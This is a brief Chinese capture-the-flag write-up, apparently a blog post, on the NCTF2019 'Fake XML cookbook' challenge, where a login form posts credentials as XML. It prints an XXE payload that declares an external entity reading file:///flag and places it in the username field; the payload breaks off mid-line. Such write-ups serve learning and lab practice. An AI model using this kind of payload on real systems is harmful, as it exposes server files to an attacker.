【BUUCTF】[NCTF2019]Fake XML cookbook
bp抓包观察,username和password是以xml文件形式post的
学习从XML相关一步一步到XXE漏洞
用最基本的XXE攻击
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY user SYSTEM "file:///flag">
]>
<user><username>&user;</username><password>123&
原创
2022-04-30 16:19:13 ·
296 阅读 ·
0 评论